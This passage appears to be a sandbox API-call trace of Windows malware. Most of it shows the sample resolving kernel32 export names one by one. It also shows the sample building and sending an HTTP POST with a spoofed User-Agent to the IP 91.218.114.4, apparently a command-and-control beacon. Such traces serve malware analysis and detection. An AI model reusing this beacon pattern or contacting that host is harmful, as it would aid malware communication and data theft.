(lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0049.331] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0049.331] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0049.331] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0049.331] lstrlenA (lpString="DELETEFIBER") returned 11 [0049.331] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0049.331] lstrlenA (lpString="DELETEFILEA") returned 11 [0049.331] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0049.331] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0049.331] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0049.331] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0049.331] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0049.331] lstrlenA (lpString="DELETEFILEW") returned 11 [0049.331] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0049.331] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0049.331] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0049.331] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0049.331] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0049.332] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0049.332] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0049.332] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0049.332] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0049.332] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0049.332] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0049.332] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0049.332] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0049.332] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0049.332] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0049.332] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0049.332] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0049.332] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0049.332] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0049.332] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0049.332] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0049.332] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0049.332] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0049.332] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0049.332] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0049.332] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0049.332] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0049.332] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0049.332] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0049.332] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0049.332] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0049.332] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0049.332] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0049.332] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0049.332] lstrcpyA (in: lpString1=0x341eb0c, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0049.332] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0049.332] lstrcpyA (in: lpString1=0x341eb0c, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0049.332] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0049.332] lstrcpyA (in: lpString1=0x341eb0c, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0049.332] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0049.332] lstrcpyA (in: lpString1=0x341eb0c, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0049.332] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0049.333] lstrcpyA (in: lpString1=0x341eb0c, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0049.333] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0049.333] lstrcpyA (in: lpString1=0x341eb0c, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0049.333] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0049.333] lstrcpyA (in: lpString1=0x341eb0c, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0049.333] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0049.333] lstrcpyA (in: lpString1=0x341eb0c, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0049.333] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0049.333] lstrcpyA (in: lpString1=0x341eb0c, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0049.333] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0049.333] lstrcpyA (in: lpString1=0x341eb0c, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0049.333] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0049.333] lstrcpyA (in: lpString1=0x341eb0c, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0049.333] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0049.333] lstrcpyA (in: lpString1=0x341eb0c, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0049.333] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0049.333] lstrcpyA (in: lpString1=0x341eb0c, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0049.333] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0049.333] lstrcpyA (in: lpString1=0x341eb0c, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0049.333] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0049.333] lstrcpyA (in: lpString1=0x341eb0c, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0049.333] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0049.333] lstrcpyA (in: lpString1=0x341eb0c, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0049.333] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0049.333] lstrcpyA (in: lpString1=0x341eb0c, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0049.334] wsprintfA (in: param_1=0xb40000, param_2="POST /%s HTTP/1.1\r\nUser-Agent: %s\r\nHost: %s\r\nContent-Type: %s\r\nContent-Length: %d\r\nConnection: Keep-Alive\r\n\r\n" | out: param_1="POST /create/ehphacw.jspx?g=y&wp=ay HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko\r\nHost: 91.218.114.4\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 247\r\nConnection: Keep-Alive\r\n\r\n") returned 248 [0049.334] send (s=0x224, buf=0xb40000*, len=495, flags=0) returned 495 [0049.335] shutdown (s=0x224, how=1) returned 0 [0049.335] recv (in: s=0x224, buf=0x341f7d0, len=1, flags=0 | out: buf=0x341f7d0) returned 0 [0049.663] closesocket (s=0x224) returned 0 [0049.663] WSACleanup () returned 0 [0049.698] VirtualFree (lpAddress=0xb40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0049.698] VirtualFree (lpAddress=0x800000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0049.698] VirtualFree (lpAddress=0x810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0049.702] lstrlenA (lpString="kernel32.dll") returned 12 [0049.702] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0049.702] lstrcpyA (in: lpString1=0x341f148, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0049.702] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0049.702] lstrcpyA (in: lpString1=0x341f148, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0049.702] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0049.702] lstrcpyA (in: lpString1=0x341f148, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0049.702] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0049.702] lstrcpyA (in: lpString1=0x341f148, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0049.702] lstrlenA (lpString="ADDATOMA") returned 8 [0049.702] lstrcpyA (in: lpString1=0x341f148, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0049.702] lstrlenA (lpString="ADDATOMW") returned 8 [0049.702] lstrcpyA (in: lpString1=0x341f148, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0049.702] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0049.702] lstrcpyA (in: lpString1=0x341f148, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0049.702] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0049.702] lstrcpyA (in: lpString1=0x341f148, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0049.702] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0049.703] lstrcpyA (in: lpString1=0x341f148, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0049.703] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0049.703] lstrcpyA (in: lpString1=0x341f148, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0049.703] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0049.703] lstrcpyA (in: lpString1=0x341f148, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0049.703] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0049.703] lstrcpyA (in: lpString1=0x341f148, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0049.703] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0049.703] lstrcpyA (in: lpString1=0x341f148, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0049.703] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0049.703] lstrcpyA (in: lpString1=0x341f148, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0049.703] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0049.703] lstrcpyA (in: lpString1=0x341f148, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0049.703] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0049.703] lstrcpyA (in: lpString1=0x341f148, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0049.703] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0049.703] lstrcpyA (in: lpString1=0x341f148, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0049.703] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0049.703] lstrcpyA (in: lpString1=0x341f148, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0049.703] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0049.703] lstrcpyA (in: lpString1=0x341f148, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0049.703] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0049.703] lstrcpyA (in: lpString1=0x341f148, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0049.703] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0049.703] lstrcpyA (in: lpString1=0x341f148, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0049.703] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0049.703] lstrcpyA (in: lpString1=0x341f148, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0049.703] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0049.703] lstrcpyA (in: lpString1=0x341f148, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0049.703] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0049.703] lstrcpyA (in: lpString1=0x341f148, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0049.704] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0049.704] lstrcpyA (in: lpString1=0x341f148, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0049.704] lstrlenA (lpString="BACKUPREAD") returned 10 [0049.704] lstrcpyA (in: lpString1=0x341f148, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0049.704] lstrlenA (lpString="BACKUPSEEK") returned 10 [0049.704] lstrcpyA (in: lpString1=0x341f148, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0049.704] lstrlenA (lpString="BACKUPWRITE") returned 11 [0049.704] lstrcpyA (in: lpString1=0x341f148, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0049.704] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0049.704] lstrcpyA (in: lpString1=0x341f148, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0049.704] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0049.704] lstrcpyA (in: lpString1=0x341f148, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0049.704] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0049.704] lstrcpyA (in: lpString1=0x341f148, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0049.704] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0049.704] lstrcpyA (in: lpString1=0x341f148, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0049.704] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0049.704] lstrcpyA (in: lpString1=0x341f148, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0049.704] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0049.704] lstrcpyA (in: lpString1=0x341f148, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0049.704] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0049.704] lstrcpyA (in: lpString1=0x341f148, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0049.704] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0049.704] lstrcpyA (in: lpString1=0x341f148, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0049.704] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0049.704] lstrcpyA (in: lpString1=0x341f148, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0049.704] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0049.704] lstrcpyA (in: lpString1=0x341f148, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0049.704] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0049.704] lstrcpyA (in: lpString1=0x341f148, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0049.704] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0049.705] lstrcpyA (in: lpString1=0x341f148, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0049.705] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0049.705] lstrcpyA (in: lpString1=0x341f148, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0049.705] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0049.705] lstrcpyA (in: lpString1=0x341f148, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0049.705] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0049.705] lstrcpyA (in: lpString1=0x341f148, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0049.705] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0049.705] lstrcpyA (in: lpString1=0x341f148, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0049.705] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0049.705] lstrcpyA (in: lpString1=0x341f148, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0049.705] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0049.705] lstrcpyA (in: lpString1=0x341f148, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0049.705] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0049.705] lstrcpyA (in: lpString1=0x341f148, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0049.705] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0049.705] lstrcpyA (in: lpString1=0x341f148, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0049.705] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0049.705] lstrcpyA (in: lpString1=0x341f148, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0049.705] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0049.705] lstrcpyA (in: lpString1=0x341f148, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0049.705] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0049.705] lstrcpyA (in: lpString1=0x341f148, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0049.705] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0049.705] lstrcpyA (in: lpString1=0x341f148, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0049.705] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0049.705] lstrcpyA (in: lpString1=0x341f148, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0049.705] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0049.705] lstrcpyA (in: lpString1=0x341f148, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0049.705] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0049.705] lstrcpyA (in: lpString1=0x341f148, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0049.706] lstrlenA (lpString="BEEP") returned 4 [0049.706] lstrcpyA (in: lpString1=0x341f148, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0049.706] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0049.706] lstrcpyA (in: lpString1=0x341f148, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0049.706] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0049.706] lstrcpyA (in: lpString1=0x341f148, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0049.706] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0049.706] lstrcpyA (in: lpString1=0x341f148, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0049.706] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0049.706] lstrcpyA (in: lpString1=0x341f148, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0049.706] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0049.706] lstrcpyA (in: lpString1=0x341f148, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0049.706] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0049.706] lstrcpyA (in: lpString1=0x341f148, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0049.706] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0049.706] lstrcpyA (in: lpString1=0x341f148, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0049.706] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0049.706] lstrcpyA (in: lpString1=0x341f148, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0049.706] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0049.706] lstrcpyA (in: lpString1=0x341f148, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0049.706] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0049.706] lstrcpyA (in: lpString1=0x341f148, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0049.706] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0049.706] lstrcpyA (in: lpString1=0x341f148, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0049.706] lstrlenA (lpString="CANCELIO") returned 8 [0049.706] lstrcpyA (in: lpString1=0x341f148, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0049.706] lstrlenA (lpString="CANCELIOEX") returned 10 [0049.706] lstrcpyA (in: lpString1=0x341f148, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0049.706] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0049.706] lstrcpyA (in: lpString1=0x341f148, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0049.706] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0049.706] lstrcpyA (in: lpString1=0x341f148, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0049.706] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0049.706] lstrcpyA (in: lpString1=0x341f148, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0049.706] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0049.706] lstrcpyA (in: lpString1=0x341f148, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0049.706] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0049.706] lstrcpyA (in: lpString1=0x341f148, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0049.706] lstrlenA (lpString="CHECKELEVATION") returned 14 [0049.707] lstrcpyA (in: lpString1=0x341f148, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0049.707] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0049.707] lstrcpyA (in: lpString1=0x341f148, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0049.707] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0049.707] lstrcpyA (in: lpString1=0x341f148, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0049.707] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0049.707] lstrcpyA (in: lpString1=0x341f148, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0049.707] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0049.707] lstrcpyA (in: lpString1=0x341f148, lpString2="CheckRemoteDebuggerPresent" | out: 